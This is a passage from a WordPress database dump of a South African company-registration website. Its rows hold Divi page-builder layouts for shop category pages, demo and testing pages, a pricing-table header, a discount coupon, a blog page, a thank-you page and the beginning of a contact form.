custom_css_main_2=\"box-shadow: 0px 0px 30px #bfb7b6;\" _builder_version=\"3.0.58\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" padding_bottom=\"15px\" padding_left=\"15px\" padding_right=\"15px\" padding_top=\"15px\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#7cda24\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"76%\" custom_css_main=\"box-shadow: 0px 0px 30px #bfb7b6;\"][et_pb_text _builder_version=\"3.0.87\" inline_fonts=\"Abel\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-size: x-large; color: #0c71c3;\"><strong>Business Tools<br /></strong></span></h3>[/et_pb_text][et_pb_shop type=\"product_category\" include_categories=\"business-tools\" columns_number=\"3\" orderby=\"price\" _builder_version=\"3.0.87\" title_font=\"|on|||\" price_font=\"|on|on||\" price_text_color=\"#0c71c3\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" padding_bottom=\"15px\" padding_left=\"15px\" padding_right=\"15px\" padding_top=\"15px\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#eb007e\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"80%\" custom_css_main=\"box-shadow: 0px 0px 30px #bfb7b6;\"][et_pb_text _builder_version=\"3.0.58\" inline_fonts=\"Abel\"]<h3 style=\"text-align: center;\"><span style=\"font-size: x-large; color: #0c71c3;\"><strong><span style=\"font-family: Abel;\">BEE Requirements</span></strong></span></h3>[/et_pb_text][et_pb_shop type=\"product_category\" include_categories=\"bee-requirements\" columns_number=\"3\" orderby=\"price\" _builder_version=\"3.0.87\" title_font=\"|on|||\" price_font=\"|on|on||\" price_text_color=\"#0c71c3\"][/et_pb_shop][/et_pb_column][/et_pb_row][/et_pb_section]','Product Category','','publish','closed','closed','','product-category','','','2017-11-14 13:28:54','2017-11-14 11:28:54','',0,'https://companyregistration.online/?page_id=28613',0,'page','',0),(28702,3,'2017-07-18 12:51:58','2017-07-18 10:51:58','[et_pb_section bb_built=\"1\"][et_pb_row][et_pb_column type=\"4_4\"][et_pb_shop _builder_version=\"3.0.58\" type=\"product_category\" include_categories=\"combo-deals\" columns_number=\"0\" orderby=\"menu_order\" /][/et_pb_column][/et_pb_row][/et_pb_section]','combo deals','','publish','closed','closed','','combo-deals','','','2017-07-18 12:51:58','2017-07-18 10:51:58','',0,'https://companyregistration.online/?page_id=28702',0,'page','',0),(28743,1,'2017-08-12 18:56:58','2017-08-12 16:56:58','[et_pb_section fullwidth=\"on\" background_color=\"#1f0030\"][et_pb_fullwidth_header title=\"Divi Builder\" background_layout=\"dark\" text_orientation=\"center\" scroll_down_icon_color=\"#ffffff\" scroll_down_icon_size=\"36px\" content_font_color=\"rgba(255,255,255,0.85)\" max_width=\"700px\" button_one_text=\"Join Now\" button_one_url=\"Join today\" background_overlay_color=\"rgba(40,40,48,0.8)\" title_font=\"Old Standard TT|on||on|\" title_font_size=\"62px\" title_font_size_phone=\"48px\" title_font_size_last_edited=\"on|phone\" content_font=\"Raleway||||\" content_font_size=\"20px\" custom_button_one=\"on\" button_one_text_size=\"16px\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#e85929\" button_one_border_width=\"0px\" button_one_border_radius=\"2px\" button_one_letter_spacing=\"3px\" button_one_font=\"Raleway|on||on|\" button_one_use_icon=\"off\" button_one_bg_color_hover=\"rgba(232,89,41,0.85)\" button_one_letter_spacing_hover=\"2px\" custom_css_main_element=\"padding: 6% 0 12% 0;\" custom_css_header_container=\"width: 100%;\" custom_css_button_1=\"margin-top: 40px;\" background_image=\"https://cdn.elegantthemes.com/images/tour/hummus2.jpg\" header_fullscreen=\"off\" header_scroll_down=\"off\" image_orientation=\"center\" content_orientation=\"center\" button_one_icon_placement=\"right\" custom_button_two=\"off\" button_two_letter_spacing=\"0\" button_two_icon_placement=\"right\" button_two_letter_spacing_hover=\"0\"]Divi 3.0 introduces a completely new visual interface that will forever change how you build websites. This front end editor allows you to make changes to your website...on your actual website![/et_pb_fullwidth_header][/et_pb_section][et_pb_section background_color=\"#efefe8\" custom_css_main_element=\"z-index: 999;\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0px||0px|\" custom_margin=\"-100px||60px|\" make_equal=\"on\" background_color_1=\"#ffffff\" background_color_2=\"#ffffff\" bg_img_1=\"https://cdn.elegantthemes.com/images/tour/limes.jpg\" bg_img_2=\"https://cdn.elegantthemes.com/images/tour/springrolls.jpg\" bg_img_3=\"https://cdn.elegantthemes.com/images/tour/eggs.jpg\" bg_img_4=\"https://cdn.elegantthemes.com/images/tour/lemons.jpg\" background_position_1=\"bottom_center\" background_position_2=\"bottom_center\" background_position_3=\"bottom_center\" background_position_4=\"bottom_center\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" background_repeat_3=\"no-repeat\" background_repeat_4=\"no-repeat\" custom_css_main_element=\"overflow: visible !important;||-webkit-box-shadow: 0px 4px 30px 4px rgba(0,0,0,0.08);||-moz-box-shadow: 0px 4px 30px 4px rgba(0,0,0,0.08);||box-shadow: 0px 4px 30px 4px rgba(0,0,0,0.08);\" background_position=\"top_left\" background_repeat=\"repeat\" background_size=\"initial\"][et_pb_column type=\"1_4\"][et_pb_blurb title=\"Click & type\" use_icon=\"on\" font_icon=\"%%119%%\" icon_color=\"rgba(46,48,55,0.38)\" animation=\"off\" text_orientation=\"center\" use_icon_font_size=\"on\" icon_font_size=\"32px\" header_font=\"Raleway|on||on|\" header_font_size=\"20\" header_text_color=\"#3a3e59\" body_font_size=\"16px\" body_text_color=\"rgba(46,48,55,0.5)\" body_line_height=\"1.8em\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(255,255,255,0)\" custom_padding=\"40px|24px|140%|24px\" custom_css_blurb_title=\"margin-bottom: 10px;\" saved_tabs=\"all\" background_position=\"top_left\" background_repeat=\"repeat\" background_size=\"initial\"]<p>Lorem ipsum dolor sit amet consectetur adipiscing elit el vivamus eu vehicula.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_blurb title=\"Drag & Drop\" use_icon=\"on\" font_icon=\"%%372%%\" icon_color=\"rgba(46,48,55,0.38)\" animation=\"off\" text_orientation=\"center\" use_icon_font_size=\"on\" icon_font_size=\"32px\" header_font=\"Raleway|on||on|\" header_font_size=\"20\" header_text_color=\"#3a3e59\" body_font_size=\"16px\" body_text_color=\"rgba(46,48,55,0.5)\" body_line_height=\"1.8em\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#e4e4e4\" background_color_gradient_end=\"rgba(228,228,228,0)\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"90%\" custom_padding=\"40px|24px|140%|24px\" custom_css_blurb_title=\"margin-bottom: 10px;\" saved_tabs=\"all\" background_position=\"top_left\" background_repeat=\"repeat\" background_size=\"initial\"]<p>Lorem ipsum dolor sit amet consectetur adipiscing elit el vivamus eu vehicula.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_blurb title=\"Fully Customize\" use_icon=\"on\" font_icon=\"%%70%%\" icon_color=\"rgba(46,48,55,0.38)\" animation=\"off\" text_orientation=\"center\" use_icon_font_size=\"on\" icon_font_size=\"32px\" header_font=\"Raleway|on||on|\" header_font_size=\"20\" header_text_color=\"#3a3e59\" body_font_size=\"16px\" body_text_color=\"rgba(46,48,55,0.5)\" body_line_height=\"1.8em\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#efefef\" background_color_gradient_end=\"rgba(239,239,239,0)\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"90%\" custom_padding=\"40px|24px|140%|24px\" custom_css_blurb_title=\"margin-bottom: 10px;\" saved_tabs=\"all\" background_position=\"top_left\" background_repeat=\"repeat\" background_size=\"initial\"]<p>Lorem ipsum dolor sit amet consectetur adipiscing elit el vivamus eu vehicula.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_blurb title=\"Clone & Delete\" use_icon=\"on\" font_icon=\"%%100%%\" icon_color=\"rgba(46,48,55,0.38)\" animation=\"off\" text_orientation=\"center\" use_icon_font_size=\"on\" icon_font_size=\"32px\" header_font=\"Raleway|on||on|\" header_font_size=\"20\" header_text_color=\"#3a3e59\" body_font_size=\"16px\" body_text_color=\"rgba(46,48,55,0.5)\" body_line_height=\"1.8em\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d7d9d9\" background_color_gradient_end=\"rgba(215,217,217,0)\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"90%\" custom_padding=\"40px|24px|140%|24px\" custom_css_blurb_title=\"margin-bottom: 10px;\" saved_tabs=\"all\" background_position=\"top_left\" background_repeat=\"repeat\" background_size=\"initial\"]<p>Lorem ipsum dolor sit amet consectetur adipiscing elit el vivamus eu vehicula.</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fullwidth=\"off\" specialty=\"off\" custom_padding=\"0px|||\" background_color=\"#efefe8\"][et_pb_row custom_margin=\"|||\" padding_top_1=\"10%\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" background_position=\"top_left\" background_repeat=\"repeat\" background_size=\"initial\"][et_pb_column type=\"1_2\"][et_pb_blurb title=\"So simple!\" animation=\"off\" text_orientation=\"right\" header_font=\"Raleway|on||on|\" header_font_size=\"36px\" header_text_color=\"#3a3e59\" custom_css_main_element=\"max-width: none;\" background_position=\"top_left\" background_repeat=\"repeat\" background_size=\"initial\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse tempus sed odio non blandit. Ut varius purus eget erat ornare facilisis. Mauris pharetra lacus nec sapien iaculis, sit amet ullamcorper sapien finibus.[/et_pb_blurb][et_pb_button button_text=\"Learn more\" button_alignment=\"right\" background_layout=\"dark\" disabled_on=\"on|on|\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#e85929\" button_border_width=\"0px\" button_border_radius=\"3px\" button_letter_spacing=\"3px\" button_font=\"Raleway|on||on|\" button_use_icon=\"off\" button_bg_color_hover=\"#e84712\" button_letter_spacing_hover=\"2px\" background_color=\"#7EBEC5\" /][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image src=\"https://cdn.elegantthemes.com/images/tour/jar.jpg\" align=\"center\" max_width=\"510px\" /][/et_pb_column][/et_pb_row][et_pb_row custom_margin=\"|||\" make_equal=\"on\" padding_top_2=\"14%\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" background_position=\"top_left\" background_repeat=\"repeat\" background_size=\"initial\"][et_pb_column type=\"1_2\"][et_pb_image src=\"https://cdn.elegantthemes.com/images/tour/cake.jpg\" animation=\"right\" align=\"center\" max_width=\"510px\" /][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_blurb title=\"So sweet!\" animation=\"off\" header_font=\"Raleway|on||on|\" header_font_size=\"36px\" header_text_color=\"#3a3e59\" custom_css_main_element=\"max-width: none;\" background_position=\"top_left\" background_repeat=\"repeat\" background_size=\"initial\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse tempus sed odio non blandit. Ut varius purus eget erat ornare facilisis. Mauris pharetra lacus nec sapien iaculis, sit amet ullamcorper sapien finibus.[/et_pb_blurb][et_pb_button button_text=\"Learn more\" button_alignment=\"left\" background_layout=\"dark\" disabled_on=\"on|on|\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#e85929\" button_border_width=\"0px\" button_border_radius=\"2px\" button_letter_spacing=\"3px\" button_font=\"Raleway|on||on|\" button_use_icon=\"off\" button_bg_color_hover=\"#e84712\" button_letter_spacing_hover=\"2px\" background_color=\"#7EBEC5\" /][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section background_color=\"#212127\" custom_padding=\"|||\" fullwidth=\"on\"][et_pb_fullwidth_header title=\"Perfectly Diverse\" background_layout=\"dark\" text_orientation=\"center\" scroll_down_icon_color=\"#ffffff\" scroll_down_icon_size=\"36px\" content_font_color=\"rgba(255,255,255,0.72)\" button_one_text=\"Download\" background_overlay_color=\"rgba(255,255,255,0)\" title_font=\"Old Standard TT|on||on|\" title_font_size=\"62px\" title_font_size_tablet=\"62px\" title_font_size_phone=\"48px\" title_font_size_last_edited=\"on|phone\" content_font=\"Raleway||||\" content_font_size=\"20px\" content_text_color=\"#ffffff\" custom_button_one=\"on\" button_one_text_size=\"16px\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#e85929\" button_one_border_width=\"0px\" button_one_border_radius=\"2px\" button_one_letter_spacing=\"3px\" button_one_font=\"Raleway|on||on|\" button_one_use_icon=\"off\" button_one_bg_color_hover=\"rgba(232,89,41,0.85)\" button_one_letter_spacing_hover=\"2px\" custom_css_main_element=\"padding: 6% 0;\" custom_css_header_container=\"width: 100%;\" custom_css_button_1=\"margin-top: 40px;\"]<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer vel mollis eros. Vestibulum in blandit massa. Nunc lorem lacus, lacinia ut lobortis id, tempor a sem. Vivamus rhoncus imperdiet quam quis vestibulum. Sed at dui orci. </p>[/et_pb_fullwidth_header][/et_pb_section][et_pb_section fullwidth=\"on\"][et_pb_fullwidth_image src=\"https://cdn.elegantthemes.com/images/tour/cheese.jpg\" animation=\"off\" /][/et_pb_section]','Divi Builder Demo','','publish','closed','closed','','divi-builder-demo','','','2017-08-12 18:56:58','2017-08-12 16:56:58','',0,'https://companyregistration.online/et_pb_layout/divi-builder-demo/',0,'et_pb_layout','',0),(28788,3,'2017-09-18 09:56:30','0000-00-00 00:00:00','[et_pb_section bb_built=\"1\"][et_pb_row _builder_version=\"3.0.69\" bg_img_1=\"https://companyregistration.online/wp-content/uploads/2016/09/Free-Report-cover-CoRegAdwords50off.png\" background_position_1=\"top_left\" background_repeat_1=\"no-repeat\" background_position_2=\"top_left\" background_repeat_2=\"no-repeat\"][et_pb_column type=\"1_3\"][et_pb_divider _builder_version=\"3.0.69\" divider_style=\"solid\" divider_position=\"top\" height=\"200\" hide_on_mobile=\"on\" /][et_pb_text _builder_version=\"3.0.69\" use_background_color_gradient=\"on\" background_color_gradient_end=\"#eb007e\" background_layout=\"light\" text_orientation=\"left\" border_style=\"solid\" background_color_gradient_start=\"#ffffff\" background_color_gradient_type=\"radial\" background_color_gradient_direction_radial=\"top\"]\r\n<h2 style=\"text-align: center;\">Starting\r\nA\r\nNew\r\nBusiness ???</h2>\r\n[/et_pb_text][et_pb_button _builder_version=\"3.0.69\" button_text=\"View Now\" button_url=\"#\" url_new_window=\"off\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"off\" button_letter_spacing=\"0\" button_icon_placement=\"right\" button_letter_spacing_hover=\"0\" /][/et_pb_column][et_pb_column type=\"1_3\"][/et_pb_column][et_pb_column type=\"1_3\"][/et_pb_column][/et_pb_row][/et_pb_section]','testing page','','draft','closed','closed','','','','','2017-09-18 09:56:30','2017-09-18 07:56:30','',0,'https://companyregistration.online/?page_id=28788',0,'page','',0),(28799,3,'2017-09-20 15:25:58','2017-09-20 13:25:58','[et_pb_section bb_built=\"1\"][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text _builder_version=\"3.0.69\" background_layout=\"light\" text_orientation=\"left\" border_style=\"solid\"]\r\n<h2 style=\"text-align: center;\">So you have decided to start your very own business???</h2>\r\n<p style=\"text-align: center;\">Depending on how much thought you have placed on it already, you probably realized there are a few things you need in place first before you can open your doors.\r\nThese include legalities such as tax registrations, marketing, name registrations, website etc.</p>\r\n<p style=\"text-align: center;\">Partnered with <span style=\"color: #0000ff;\">Digital Strategies </span>and <span style=\"color: #ff00ff;\">MAWInc</span> we have done all the leg-work already and will guide you through the entire process.</p>\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row][et_pb_column type=\"1_4\"][et_pb_blurb _builder_version=\"3.0.69\" title=\"Registrations\" url_new_window=\"off\" use_icon=\"on\" font_icon=\"%%75%%\" use_circle=\"off\" use_circle_border=\"off\" icon_placement=\"top\" use_icon_font_size=\"off\" background_layout=\"light\" border_style=\"solid\" animation=\"top\" header_font_size=\"22\" header_text_color=\"#8300e9\"]\r\n<ul>\r\n 	<li>Name Registrations</li>\r\n 	<li>Tax Registration</li>\r\n</ul>\r\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_blurb _builder_version=\"3.0.69\" title=\"Web Development\" url_new_window=\"off\" use_icon=\"on\" font_icon=\"%%165%%\" use_circle=\"off\" use_circle_border=\"off\" icon_placement=\"top\" use_icon_font_size=\"off\" background_layout=\"light\" border_style=\"solid\" animation=\"top\" header_font_size=\"22\" header_text_color=\"#8300e9\"]\r\n<ul>\r\n 	<li>Domain</li>\r\n 	<li>Website</li>\r\n 	<li>Built in applications</li>\r\n</ul>\r\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_blurb _builder_version=\"3.0.69\" title=\"Marketing\" url_new_window=\"off\" use_icon=\"on\" font_icon=\"%%103%%\" use_circle=\"off\" use_circle_border=\"off\" icon_placement=\"top\" use_icon_font_size=\"off\" background_layout=\"light\" border_style=\"solid\" animation=\"top\" header_font_size=\"22\" header_text_color=\"#8300e9\"]\r\n<ul>\r\n 	<li>SEO (Search Engine Optimization)</li>\r\n 	<li>Social Media Marketing</li>\r\n 	<li>Marketing Automation</li>\r\n</ul>\r\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_blurb _builder_version=\"3.0.69\" title=\"Administrations \" url_new_window=\"off\" use_icon=\"on\" font_icon=\"%%156%%\" use_circle=\"off\" use_circle_border=\"off\" icon_placement=\"top\" use_icon_font_size=\"off\" background_layout=\"light\" border_style=\"solid\" animation=\"top\" header_font_size=\"22\" header_text_color=\"#8300e9\"]\r\n<ul>\r\n 	<li>Accounting</li>\r\n 	<li>payroll</li>\r\n 	<li>Tax Returns</li>\r\n</ul>\r\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','testing page','','publish','closed','closed','','testing-page','','','2017-09-20 15:25:58','2017-09-20 13:25:58','',0,'https://companyregistration.online/?page_id=28799',0,'page','',0),(28944,3,'2017-11-14 13:09:02','2017-11-14 11:09:02','[et_pb_row custom_padding=\"0px|0px|0px|0px\" _builder_version=\"3.0.58\" template_type=\"row\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.0.87\" tab_font=\"|on|||\" tab_text_color=\"#0c71c3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\"][et_pb_tab title=\"Great Value\" _builder_version=\"3.0.58\" inline_fonts=\"Abel\"]<h4><span style=\"font-family: Abel; font-weight: normal;\"><strong>Registration for taxes will have to be done at some time in the future, why not do it now and save. Income tax registration occurs automatically when the company is registered.</strong></span></h4>\r[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.0.58\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. Tbe payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.0.58\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents <span style=\"color: #993366;\">for your tender</span> fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>\r[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row]','header for pricing table','','publish','closed','closed','','header-for-pricing-table','','','2017-11-14 13:09:02','2017-11-14 11:09:02','',0,'https://companyregistration.online/et_pb_layout/header-for-pricing-table/',0,'et_pb_layout','',0),(28957,1,'2017-11-14 14:10:58','2017-11-14 12:10:58','','customise','Applies a 25% discount on purchases of R1000 or more','publish','closed','closed','','combo3','','','2018-05-05 20:53:35','2018-05-05 18:53:35','',0,'https://companyregistration.online/?post_type=shop_coupon&#038;p=28957',0,'shop_coupon','',0),(29011,3,'2018-02-01 14:53:33','2018-02-01 12:53:33','[et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Hero Section\" _builder_version=\"3.0.98\"][et_pb_fullwidth_header title=\"Welcome To\" subhead=\"Our Blog\" header_scroll_down=\"on\" background_overlay_color=\"rgba(0,86,237,0.58)\" content_max_width=\"550px\" _builder_version=\"3.2.2\" title_font=\"Poppins|700||on|||||\" title_text_color=\"#edbb5f\" title_font_size=\"20px\" title_letter_spacing=\"2px\" title_line_height=\"1.4em\" content_font=\"Poppins||||||||\" content_font_size=\"16px\" content_letter_spacing=\"1px\" content_line_height=\"2em\" subhead_font=\"Abel|700||on|||||\" subhead_font_size=\"61px\" subhead_letter_spacing=\"3px\" subhead_line_height=\"1.4em\" background_color=\"rgba(255,255,255,0)\" background_image=\"https://companyregistration.online/wp-content/uploads/2018/05/consultant-08.jpg\" parallax=\"on\" parallax_method=\"on\" custom_button_two=\"on\" button_two_border_width=\"1px\" button_two_border_color=\"rgba(255,255,255,0.3)\" button_two_border_radius=\"0px\" button_two_letter_spacing=\"1px\" button_two_font=\"Saira Extra Condensed|600||on|||||\" button_two_icon=\"%%3%%\" button_two_icon_color=\"#edbb5f\" button_two_text_color_hover=\"#edbb5f\" button_two_bg_color_hover=\"rgba(0,0,0,0)\" custom_button_one=\"on\" button_one_border_width=\"1px\" button_one_border_color=\"rgba(255,255,255,0.3)\" button_one_border_radius=\"0px\" button_one_letter_spacing=\"1px\" button_one_font=\"Saira Extra Condensed|600||on|||||\" button_one_icon=\"%%3%%\" button_one_icon_color=\"#edbb5f\" button_one_text_color_hover=\"#edbb5f\" button_one_bg_color_hover=\"rgba(0,0,0,0)\" module_alignment=\"right\" custom_margin=\"|||\" custom_padding=\"8%||250px|\"]<p>The best place to get information about company administration matters</p>[/et_pb_fullwidth_header][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Blog\" _builder_version=\"3.0.99\" custom_padding=\"100px|0px|100px|0px\"][et_pb_row use_custom_width=\"on\" custom_width_px=\"1440px\" _builder_version=\"3.0.99\"][et_pb_column type=\"2_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blog fullwidth=\"off\" posts_number=\"12\" show_more=\"on\" _builder_version=\"3.2.2\" header_font=\"Playfair Display|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Poppins||||||||\" body_font_size=\"16px\" body_line_height=\"2em\" meta_font=\"Poppins|600||on|||||\" meta_text_color=\"#edbb5f\" meta_font_size=\"12px\" meta_letter_spacing=\"1px\" meta_line_height=\"2em\" pagination_font=\"Poppins|600||on|||||\" pagination_text_color=\"#edbb5f\" pagination_font_size=\"16px\" pagination_letter_spacing=\"1px\" pagination_line_height=\"2em\" border_width_all=\"0px\" box_shadow_style=\"preset3\" box_shadow_vertical=\"15px\" box_shadow_blur=\"80px\" box_shadow_color=\"rgba(0,0,0,0.2)\" text_orientation=\"center\" custom_margin=\"-200px|||\" custom_padding=\"|||\" custom_padding_phone=\"|40px||40px\" custom_padding_last_edited=\"off|desktop\" animation_style=\"fold\" animation_direction=\"top\"][/et_pb_blog][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_sidebar area=\"sidebar-1\" _builder_version=\"3.2.1\" header_font=\"Poppins|600||on|||||\" header_font_size=\"14px\" header_letter_spacing=\"1px\" header_line_height=\"1.8em\" body_font=\"Poppins||||||||\" body_line_height=\"2em\" border_style_all=\"none\" custom_padding=\"|||\" custom_padding_tablet=\"|||0px\" custom_padding_last_edited=\"off|desktop\"][/et_pb_sidebar][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Subscribe\" _builder_version=\"3.0.99\" background_color=\"#282828\" custom_margin=\"100px||100px|\" custom_padding=\"0px|0px|0px|0px\"][et_pb_row custom_padding=\"0px|0px|0px|0px\" custom_margin=\"|||\" _builder_version=\"3.0.99\"][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_signup mailchimp_list=\"SlavaET|03dac884f0\" name_field=\"on\" title=\"Join Our Newsletter\" form_field_text_color=\"rgba(0,0,0,0.7)\" _builder_version=\"3.0.99\" header_font=\"Playfair Display|700||on|||||\" header_font_size=\"38px\" header_line_height=\"1.4em\" body_font=\"Poppins||||||||\" body_font_size=\"16px\" body_line_height=\"2em\" result_message_font=\"||||||||\" background_color=\"#ffffff\" border_color_all_fields=\"#dfdfe3\" border_width_bottom_fields=\"1px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#edbb5f\" button_border_width=\"0px\" button_border_radius=\"0px\" button_letter_spacing=\"1px\" button_font=\"Saira Extra Condensed|600||on|||||\" button_icon=\"%%3%%\" button_letter_spacing_hover=\"1px\" box_shadow_style=\"preset3\" box_shadow_vertical=\"15px\" box_shadow_blur=\"80px\" box_shadow_color=\"rgba(0,0,0,0.2)\" text_orientation=\"center\" background_layout=\"light\" custom_margin=\"-60px||-60px|\" custom_padding=\"60px|60px|60px|60px\" custom_padding_phone=\"|40px||40px\" custom_padding_last_edited=\"on|desktop\" animation_style=\"slide\" animation_direction=\"left\" locked=\"off\"]We Promise We Wont Spam\r\n[/et_pb_signup][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][/et_pb_row][/et_pb_section]','Blog','','publish','closed','closed','','blog','','','2018-11-13 16:16:37','2018-11-13 14:16:37','',0,'https://companyregistration.online/?page_id=29011',0,'page','',0),(29047,3,'2018-04-17 09:37:08','2018-04-17 07:37:08','[et_pb_section fb_built=\"1\" _builder_version=\"3.0.97\" use_background_color_gradient=\"on\" background_color_gradient_end=\"#ffffff\" background_color_gradient_direction=\"152deg\" background_color_gradient_start_position=\"35%\" background_color_gradient_end_position=\"42%\"][et_pb_row _builder_version=\"3.0.47\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.97\" parallax=\"off\" parallax_method=\"on\"][et_pb_image _builder_version=\"3.0.97\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.0.97\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.97\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/04/thankyou4.png\" _builder_version=\"3.0.97\" align=\"center\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"150ms\" animation_duration=\"2000ms\" animation_intensity_slide=\"78%\"][/et_pb_image][et_pb_text _builder_version=\"3.0.97\" text_font=\"||||||||\" text_font_size=\"44px\" text_text_color=\"#0c71c3\"]<p style=\"text-align: center;\">Your Submission Has Been Successful</p>\n[/et_pb_text][et_pb_text _builder_version=\"3.0.97\" text_font=\"||||||||\" text_font_size=\"25px\"]<p style=\"text-align: center;\">Please check your E-mails</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Thank You','','publish','closed','closed','','thank-you','','','2018-04-17 09:53:33','2018-04-17 07:53:33','',0,'https://companyregistration.online/?page_id=29047',0,'page','',0),(29109,1,'2018-05-06 20:37:38','2018-05-06 18:37:38','','WHAT I NEED TO KNOW BEFORE I START MY BUSINESS IN SOUTH AFRICA','','inherit','open','closed','','what-i-need-to-know-before-i-start-my-business-in-south-africa','','','2018-05-06 20:37:38','2018-05-06 18:37:38','',80,'https://companyregistration.online/wp-content/uploads/woocommerce_uploads/2016/03/WHAT-I-NEED-TO-KNOW-BEFORE-I-START-MY-BUSINESS-IN-SOUTH-AFRICA.pdf',0,'attachment','application/pdf',0),(29111,3,'2018-05-11 15:27:42','2018-05-11 13:27:42','[et_pb_section fb_built=\"1\" _builder_version=\"3.0.47\"][et_pb_row _builder_version=\"3.0.47\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.2.1\" parallax=\"off\" parallax_method=\"on\"][et_pb_contact_form email=\"Info@companyregistration.online\" title=\"Getting Started\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.2.2\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" _builder_version=\"3.0.47\" border_radii=\"on||||\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Surname\" field_title=\"Surname\" _builder_version=\"3.2.1\" border_radii=\"on||||\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email_Address\" field_title=\"Email \" _builder_version=\"3.2.1\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Contact_Person\" field_title=\"Contact Person\" _builder_version=\"3.2.1\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Contact_Number\" field_title=\"Contact Number\" _builder_version=\"3.2.1\"][/et_pb_contact_field][et_pb_contact_field 